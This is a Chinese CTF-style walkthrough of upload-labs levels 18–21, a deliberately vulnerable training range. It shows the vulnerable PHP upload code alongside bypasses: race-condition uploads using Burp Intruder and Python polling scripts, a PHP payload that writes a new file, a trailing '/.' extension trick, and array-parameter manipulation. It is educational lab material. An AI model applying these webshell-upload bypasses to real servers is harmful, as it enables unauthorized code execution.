upload-labs 18-21关 详解 (完结)

  • Post author:
  • Post category:其他


【pass-18】

$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件!";
            unlink($upload_file);
        }
    }else{
        $msg = '上传出错!';
    }
}


从源码来看,服务器先是将上传的文件保存下来,然后将文件的后缀名同白名单对比,如果是jpg、png、gif中的一种,就将文件进行重命名。如果不符合的话,unlink()函数就会删除该文件。


如果我们还是上传一个图片马的话,网站依旧存在文件包含漏洞我们还是可以进行利用。但是如果没有文件包含漏洞的话,我们就只能上传一个php木马来解析运行了。


但是php上传就会被删除,无法去访问


代码执行需要消耗时间,如果能在上传的php被删除之前访问就可以。


条件性上传绕过


我们可以利用burp多线程发包,然后不断在浏览器访问我们的webshell,会有访问成功的时候。


需要修改以下上传的php一句话:

<?php fputs(fopen('2.php','w'),'<?php phpinfo();?>');?>


让其被执行的时候在文件下写一个名为2.php的文件


否则就算是访问到了,很快也就删除了,意义不大。


开启抓包,上传:


发送到bp的intruder模块


接着设置无限发送空的Payloads,来让它一直上传该文件


编写一个python脚本,让其不停访问上传的1.php文件,访问到后返回ok

import requests
url = "http://192.168.121.132:81/upload-labs/upload/1.php"
while True:
    html = requests.get(url)
    if html.status_code == 200:
        print("OK")
        break


开始爆破,同时运行脚本:


返回ok证明访问成功


这时上传的目录会新生成一个2.php的文件,进行访问

【pass-19】

//index.php
$is_upload = false;
$msg = null;
if (isset($_POST['submit']))
{
    require_once("./myupload.php");
    $imgFileName =time();
    $u = new MyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FILES['upload_file']['size'],$imgFileName);
    $status_code = $u->upload(UPLOAD_PATH);
    switch ($status_code) {
        case 1:
            $is_upload = true;
            $img_path = $u->cls_upload_dir . $u->cls_file_rename_to;
            break;
        case 2:
            $msg = '文件已经被上传,但没有重命名。';
            break; 
        case -1:
            $msg = '这个文件不能上传到服务器的临时文件存储目录。';
            break; 
        case -2:
            $msg = '上传失败,上传目录不可写。';
            break; 
        case -3:
            $msg = '上传失败,无法上传该类型文件。';
            break; 
        case -4:
            $msg = '上传失败,上传的文件过大。';
            break; 
        case -5:
            $msg = '上传失败,服务器已经存在相同名称文件。';
            break; 
        case -6:
            $msg = '文件无法上传,文件不能复制到目标目录。';
            break;      
        default:
            $msg = '未知错误!';
            break;
    }
}

//myupload.php
class MyUpload{
......
......
...... 
  var $cls_arr_ext_accepted = array(
      ".doc", ".xls", ".txt", ".pdf", ".gif", ".jpg", ".zip", ".rar", ".7z",".ppt",
      ".html", ".xml", ".tiff", ".jpeg", ".png" );

......
......
......  
  /** upload()
   **
   ** Method to upload the file.
   ** This is the only method to call outside the class.
   ** @para String name of directory we upload to
   ** @returns void
  **/
  function upload( $dir ){
    
    $ret = $this->isUploadedFile();
    
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->setDir( $dir );
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->checkExtension();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->checkSize();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );    
    }
    
    // if flag to check if the file exists is set to 1
    
    if( $this->cls_file_exists == 1 ){
      
      $ret = $this->checkFileExists();
      if( $ret != 1 ){
        return $this->resultUpload( $ret );    
      }
    }

    // if we are here, we are ready to move the file to destination

    $ret = $this->move();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );    
    }

    // check if we need to rename the file

    if( $this->cls_rename_file == 1 ){
      $ret = $this->renameFile();
      if( $ret != 1 ){
        return $this->resultUpload( $ret );    
      }
    }
    
    // if we are here, everything worked as planned :)

    return $this->resultUpload( "SUCCESS" );
  
  }
......
......
...... 
};


从源码来看的话,服务器先是将文件后缀跟白名单做了对比,然后检查了文件大小以及文件是否已经存在。文件上传之后又对其进行了重命名。


这么看来,不能上传php了,只能上传图片马,而且需要在图片马没有被重命名之前访问它。要让图片马能够执行还要配合其他漏洞,比如文件包含,apache解析漏洞等。


这里还是将前一关的代码插入图片作出图片马。然后通过文件包含去访问该图片马。


制作图片马


抓包上传图片马(在bp上的操作基本上和第18关没区别)


同样发送到bp的intruder模块


接着设置无限发送空的Payloads,来让它一直上传该文件


这里python脚本需要有所修改


如果访问失败会返回Warninig,所以用Warning进行判定:

import requests
url = "http://192.168.121.132:81/upload-labs/include.php?file=upload/pass19.png"
while True:
    html = requests.get(url)
    if ('Warning' not in str(html.text)):
        print("OK")
        break


同样,开始爆破并且执行脚本


返回ok证明访问成功


访问2.php(2.php在upload-labs目录下)

【pass-20】


没有对上传的文件做判断,只对用户输入的文件名做判断


黑名单用于用户输入的文件后缀名进行判断


move_uploaded_file()还有这么一个特性,会忽略掉文件末尾的 /.


先准备PHP一句话,并把后缀名改为jpg再上传


把upload-19.jpg改为upload-19.php/.


上传成功

【pass-21】

$is_upload = false;
$msg = null;
if(!empty($_FILES['upload_file'])){
    //检查MIME
    $allow_type = array('image/jpeg','image/png','image/gif');
    if(!in_array($_FILES['upload_file']['type'],$allow_type)){
        $msg = "禁止上传该类型文件!";
    }else{
        //检查文件名
        $file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
        if (!is_array($file)) {
            $file = explode('.', strtolower($file));
        }

        $ext = end($file);
        $allow_suffix = array('jpg','png','gif');
        if (!in_array($ext, $allow_suffix)) {
            $msg = "禁止上传该后缀文件!";
        }else{
            $file_name = reset($file) . '.' . $file[count($file) - 1];
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' .$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $msg = "文件上传成功!";
                $is_upload = true;
            } else {
                $msg = "文件上传失败!";
            }
        }
    }
}else{
    $msg = "请选择要上传的文件!";
}


需要修改MIME TYPE类型,进行拼接


抓包上传:


修改content-type修改POST参数为数组类型,索引[0]为`upload-20.php`,索引[2]为`jpg|png|gif`。只要第二个索引`不为1`,$file[count($file) – 1]就等价于$file[2-1],值为空


访问图片


至此,upload-labs靶场闯关完结



版权声明:本文为qq_53409748原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。